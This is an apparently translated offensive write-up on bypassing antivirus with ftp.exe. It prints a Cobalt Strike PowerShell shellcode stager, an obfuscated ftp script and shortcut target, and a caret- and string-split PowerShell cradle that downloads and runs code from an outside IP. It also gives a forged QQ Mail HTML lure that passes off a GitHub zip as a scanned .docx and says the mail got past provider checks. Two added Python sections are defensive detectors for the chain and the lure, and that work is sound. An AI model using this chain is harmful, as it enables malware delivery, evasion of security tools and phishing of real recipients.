FTP AV evasion: bypassing antivirus with ftp.exe
Building the remote malicious .ps1 on the CS team server
Start the CS team server:
./teamserver ip password
Then connect with the client, create a listener, and generate the PowerShell payload.
Contents of a.ps1 (the stock Cobalt Strike PowerShell stager):
Set-StrictMode -Version 2

# Resolve an export of a loaded module via reflection on System.dll's
# internal UnsafeNativeMethods (GetModuleHandle / GetProcAddress), so no
# Add-Type / P/Invoke declaration is needed.
function func_get_proc_address {
    Param ($var_module, $var_procedure)
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

# Build a delegate type in memory with the given parameter and return types,
# so a raw function pointer can be called through GetDelegateForFunctionPointer.
function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}

# 64-bit only: decode the XOR(35)-encoded shellcode, allocate RWX memory
# (MEM_COMMIT|MEM_RESERVE = 0x3000, PAGE_EXECUTE_READWRITE = 0x40), copy it in and call it.
If ([IntPtr]::size -eq 8) {
    [Byte[]]$var_code = [System.Convert]::FromBase64String('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')
    for ($x = 0; $x -lt $var_code.Count; $x++) {
        $var_code[$x] = $var_code[$x] -bxor 35
    }
    $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
    $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
    [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
    $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
    $var_runme.Invoke([IntPtr]::Zero)
}
Building the malicious ftp command file
Note: in the shortcut's properties, leave the "Start in" field empty (so the relative file names below resolve next to the shortcut) and set the Target to:
C:\Windows\System32\ftp.exe -""s:good.dll
Breakdown of the target:
- Everything after ftp.exe is the argument list passed to ftp.exe.
- -s is a standard ftp.exe switch that names a script file containing FTP commands to run.
- "" is an empty quoted string spliced into the switch. The C runtime's argument parser strips the quotes while building argv, so ftp.exe still receives -s:good.dll, but the literal string -s: never appears in the shortcut, which defeats naive string matching on the command line.
- good.dll is that script file (the name is arbitrary). The .dll extension is only a disguise; ftp.exe reads it as plain text.
Contents of good.dll. The principle: in ftp's interactive command mode, a line beginning with ! is handed to the command shell and executed.
!cmd /c po^we^rs^he^ll -ex^ec b^yp^ass .\bad.ps1
This is an obfuscated spelling:
- ^ is cmd.exe's escape character. cmd removes it while parsing, so po^we^rs^he^ll executes as powershell, but the word powershell never appears in the file, which defeats simple string matching.
- -exec bypass (short for -ExecutionPolicy Bypass) makes PowerShell ignore the execution policy for this process so the script is allowed to run.
- .\bad.ps1 is the PowerShell script to execute, located in the current directory.
Then put the PowerShell command into bad.ps1:
powershell.exe -nOp -w hIdDEn -c $ExeCuTiOnCoNtExT.InvOkeCoMmAnD.NeWScriPtBlOcK("IE##X ((nE##w-ObJe##ct ('nE##T.wEB##cLiEnT')).('doWnl##OadStRiNg').inVo##KE('ht'+'tp:/'+'/11'+'2.22'+'3.37'+'.2'+'73:8'+'777/a'))".Replace("##",""))
- -nop -w hidden starts PowerShell without a profile and with a hidden window. PowerShell parameter and cmdlet names are case-insensitive, hence the random capitalisation.
- $ExecutionContext.InvokeCommand.NewScriptBlock(...) compiles the decoded string into a script block that is then run.
- .Replace("##","") removes the ## markers at run time. They split the keywords IEX, New-Object, Net.WebClient and DownloadString so none of them appears whole in the file, and the URL is assembled from string fragments for the same reason.
- The decoded command downloads the content at the URL and executes it as PowerShell.
The file a on the server is the PowerShell payload generated by CS earlier (a.ps1), simply renamed.
As soon as the shortcut is opened, the beacon checks in to CS immediately.
Note: this method gets past all static scanning; dynamic detection by 360 and Windows Defender can be bypassed, but some domestic AV products, such as Huorong, flag the process as suspicious the moment powershell is invoked.
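The following is an added example, not code from the original write-up, showing the defensive counterpart of the three tricks described above. It re-implements the Windows C-runtime argv splitting that turns -""s:good.dll back into -s:good.dll, removes cmd's ^ escapes, undoes the .Replace("##","") and 'a'+'b' string splitting in bad.ps1 to recover the URL, and then applies these normalisations to a few constructed Sysmon-style process-creation records so that each link of the ftp.exe -> cmd.exe -> powershell.exe chain is flagged. The records, the allow-lists and the function names are the example's own assumptions; only the command lines are taken from the page.

```python
"""Normalise the command-line tricks of the ftp.exe chain above and flag the resulting
process tree. Added example, not from the original page; the events are constructed."""
import re
from typing import Dict, List

SHELLS = {'cmd.exe', 'powershell.exe', 'pwsh.exe'}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)

def crt_argv(cmdline: str) -> List[str]:
    """Split a command line as the Microsoft C runtime builds argv: '"' toggles in-quotes
    mode and is dropped, backslashes only matter before a quote, whitespace outside quotes
    separates arguments. Hence -""s:good.dll reaches ftp.exe as -s:good.dll."""
    args, cur, in_quotes, have_token, i = [], [], False, False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '\\':
            n = 0
            while i < len(cmdline) and cmdline[i] == '\\':
                n, i = n + 1, i + 1
            if i < len(cmdline) and cmdline[i] == '"':
                cur.append('\\' * (n // 2))  # 2n backslashes before a quote -> n
                if n % 2:                    # odd count: the quote itself is literal
                    cur.append('"')
                    i += 1
            else:
                cur.append('\\' * n)         # not before a quote: all literal
            have_token = True
            continue
        if c == '"':
            in_quotes = not in_quotes
        elif c in ' \t' and not in_quotes:
            if have_token:
                args.append(''.join(cur))
                cur, have_token = [], False
            i += 1
            continue
        else:
            cur.append(c)
        have_token = True
        i += 1
    if have_token:
        args.append(''.join(cur))
    return args

def strip_carets(s: str) -> str:
    """cmd.exe drops its escape character ^ while parsing (^^ -> ^), so po^we^rs^he^ll
    runs as powershell. Quoted regions, where ^ is literal, are not special-cased."""
    return re.sub(r'\^(.)', r'\1', s)

def fold_powershell_strings(s: str) -> str:
    """Undo bad.ps1's string tricks: apply a trailing .Replace("marker","") by deleting the
    marker everywhere, then join 'a'+'b' concatenations until the URL is in one piece."""
    m = re.search(r'\.Replace\("([^"]+)",\s*""\)', s, re.I)
    if m:
        s = (s[:m.start()] + s[m.end():]).replace(m.group(1), '')
    prev = None
    while prev != s:
        prev, s = s, re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", s)
    return s

def detect(events: List[Dict[str, str]]) -> List[str]:
    """Apply the normalisations to Sysmon-style process-creation records (Image,
    ParentImage, CommandLine) and report each link of the ftp.exe -> cmd -> powershell chain."""
    base = lambda p: p.rsplit('\\', 1)[-1].lower()
    hits = []
    for ev in events:
        image, parent, raw = base(ev['Image']), base(ev['ParentImage']), ev['CommandLine']
        if image == 'ftp.exe':
            scripts = [a for a in crt_argv(raw)[1:] if a.lower().startswith('-s:')]
            if scripts:
                hits.append(f'ftp.exe started with a script file: {scripts[0][3:]}')
        if parent == 'ftp.exe' and image in SHELLS:
            argv = crt_argv(strip_carets(raw))
            hits.append(f'{image} spawned by ftp.exe (! shell escape): {" ".join(argv[1:])}')
        if image in SHELLS:
            folded = fold_powershell_strings(raw)
            if re.search(r'downloadstring|\biex\b|invoke-expression', folded, re.I):
                for url in URL_RE.findall(folded):
                    hits.append(f'{image} download cradle -> {url}')
    return hits

# Constructed records modelled on the chain above, not real telemetry. The URL is the one
# from the page's bad.ps1 sample; its last octet, 273, is out of range, so it resolves nowhere.
SAMPLE_EVENTS = [
    {'Image': r'C:\Windows\System32\ftp.exe', 'ParentImage': r'C:\Windows\explorer.exe',
     'CommandLine': r'C:\Windows\System32\ftp.exe -""s:good.dll'},
    {'Image': r'C:\Windows\System32\cmd.exe', 'ParentImage': r'C:\Windows\System32\ftp.exe',
     'CommandLine': r'cmd /c po^we^rs^he^ll -ex^ec b^yp^ass .\bad.ps1'},
    {'Image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'ParentImage': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'CommandLine': r'''powershell.exe -nOp -w hIdDEn -c $ExeCuTiOnCoNtExT.InvOkeCoMmAnD.NeWScriPtBlOcK("IE##X ((nE##w-ObJe##ct ('nE##T.wEB##cLiEnT')).('doWnl##OadStRiNg').inVo##KE('ht'+'tp:/'+'/11'+'2.22'+'3.37'+'.2'+'73:8'+'777/a'))".Replace("##",""))'''},
    {'Image': r'C:\Windows\System32\ftp.exe', 'ParentImage': r'C:\Windows\System32\cmd.exe',
     'CommandLine': r'ftp ftp.example.com'},  # ordinary interactive use: no hit
]
```

Calling detect(SAMPLE_EVENTS) yields one line per link of the chain and nothing for the benign ftp session. The point of the example is the order of operations: none of the literal strings -s:, powershell, IEX or the URL is present in the raw telemetry, so any rule that matches before normalising the command line the way the C runtime, cmd.exe and PowerShell do will miss exactly the samples shown on this page.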
The complete folder looks like this:
Pack it as a zip, upload it to GitHub, copy the download link, and insert it as the download URL in the forged HTML page:
<div id="qm_con_body"><div id="mailContentContainer" class="qmbox qm_con_body_content qqmail_webmail_only" style="opacity: 1;"><div id="attachment" a="" b="false" style="padding:2px;" class="attbg" ui-type="attCon"><div style="padding:6px 10px 10px 8px;" class="txt_left"><div style="height:14px;"> <b style="font-size:14px;"><img src="https://rescdn.qqmail.com/zh_CN/htmledition/images/spacer1e9c5d.gif" align="absmiddle" class="ico_att showattch" border="0" style="margin:-3px 2px 0 0;">附件</b>(<span id="attachmentCount">1</span> 个)</div></div><div style="padding:0 8px 6px 12px;background:#fff;_height:60px;line-height:140%;"><div class="graytext clear" style="padding-top:12px; padding-bottom:5px"><span style="color:#000;font-weight:bold;font-size:12px;">普通附件</span> <span id="span_ZL0012_1yrN1r~M_twu3KkAAIjVLc5_safe"> (<span class="ico_Avira"></span>已通过电脑管家云查杀引擎扫描)</span> </div><div class="att_bt attachitem"><div class="ico_big"><a id="AttachIconAZL0012_1yrN1r~M_twu3KkAAIjVLc50" attach="1" attid="请重点关注.docx" viewmode="doc" url="/cgi-bin/viewdocument?sid=lGnwl-6PmrgMcwZk&filename=1.docx&mailid=1&retry=true&t=attachments_content&ef=qfunc&s=yozo&fromattach=1" ck="previewAttach2" idx="0" filename="请重点关注.docx" down="/cgi-bin/download?mailid=1&filename=1.doc" iconurl="/zh_CN/htmledition/images/xdisk/ico_mid/fu_doc.gif" filebyte="15360" sparse2onlinedocurl=""><img style="width:auto;" src="/zh_CN/htmledition/images/xdisk/ico_mid/fu_doc.gif"></a></div><div class="name_big"> <span player="/cgi-bin/download?mailid=1&filename=1.docx&sid=1">请重点关注.docx</span><span class="graytext"> (15K<span id="span_attachIndex_ZL0012_1yrN1r~M_twu3KkAAIjVLc5_cd690305b12fa8de1acdd0ee2fc76181" style="display:none">, <span style="color: #C00;">附件包含病毒,请勿下载打开 </span></span>)</span><div class="down_big"><a ck="previewAttach" select="1" sparse2onlinedocurl="" down="/cgi-bin/download?mailid=1&filename=1.docx&sid=1">预览</a> <a href="github地址">下载</a> <a style="" flag="0" class="needSetFlag" 
attachkey="1|1.docx|1.docx|15360"><span>收藏</span></a><span style="display:none;" class="graytext"><span>已收藏, </span><a>查看</a></span> <a ui-type="netdiskBind" attid="1|1|1" class="netdisk_hide"><span>转存</span><span class="bind_down_icon"></span></a></div></div></div></div></div></div></div>
The HTML page disguises the link as a .docx attachment that has already been scanned, while the link actually points to the trojan download.
The edited page renders as shown below.
In testing the mail passed the mailbox provider's checks and was delivered; the recipient sees the following.
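A check for the lure above, added here as an example rather than taken from the original page: it parses a mail-body fragment, collects every anchor, and reports links that lead to a host outside the provider's own (an assumed allow-list) or that download a file whose extension differs from the attachment name shown to the user. The HTML fragment is constructed to mirror the page's snippet, with a placeholder GitHub path standing in for the author's link.

```python
"""Flag attachment links in a mail body that point off-site or whose file type differs
from what the mail shows. Added example for the lure above; the HTML sample is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import posixpath

# Hosts the provider's own attachment links live on: an assumed allow-list for the example.
TRUSTED_HOSTS = {'mail.qq.com', 'rescdn.qqmail.com'}

class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element that carries an href."""
    def __init__(self):
        super().__init__()
        self.anchors, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            self._href, self._text = dict(attrs).get('href'), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == 'a' and self._href is not None:
            self.anchors.append((self._href, ''.join(self._text).strip()))
            self._href = None

def suspicious_attachment_links(html: str, shown_name: str) -> list:
    """One finding per anchor that (a) leads to a host outside the allow-list although the
    body presents it as a provider attachment, or (b) fetches a file whose extension differs
    from the attachment name the user sees (a .zip behind a row labelled .docx)."""
    collector = AnchorCollector()
    collector.feed(html)
    shown_ext = posixpath.splitext(shown_name)[1].lower()
    findings = []
    for href, text in collector.anchors:
        parsed = urlparse(href)
        host = parsed.netloc.lower()
        if host and host not in TRUSTED_HOSTS:
            findings.append(f'"{text}" -> off-site host {host}')
        target_ext = posixpath.splitext(parsed.path)[1].lower()
        if target_ext and target_ext != shown_ext:
            findings.append(f'"{text}" -> {target_ext} download shown as {shown_ext}')
    return findings

# Constructed fragment in the shape of the lure: the preview link is a relative provider
# URL, the "下载" (download) link goes to an external zip while the row says .docx.
# The GitHub path is a placeholder, not a real repository.
SAMPLE_HTML = '''<div class="down_big">
<a ck="previewAttach" href="/cgi-bin/download?mailid=1&amp;filename=1.docx&amp;sid=1">预览</a>
<a href="https://github.com/example-user/example-repo/raw/main/lure.zip">下载</a>
<a ui-type="netdiskBind" class="netdisk_hide"><span>转存</span></a></div>'''
```

Run suspicious_attachment_links(SAMPLE_HTML, '请重点关注.docx') to get two findings for the download anchor and none for the provider's own preview link. A mail gateway or a user-side extension that rewrites links can apply the same two tests; the lure on this page relies on the reader trusting the "scanned by the provider" label instead of looking at where the download anchor actually points.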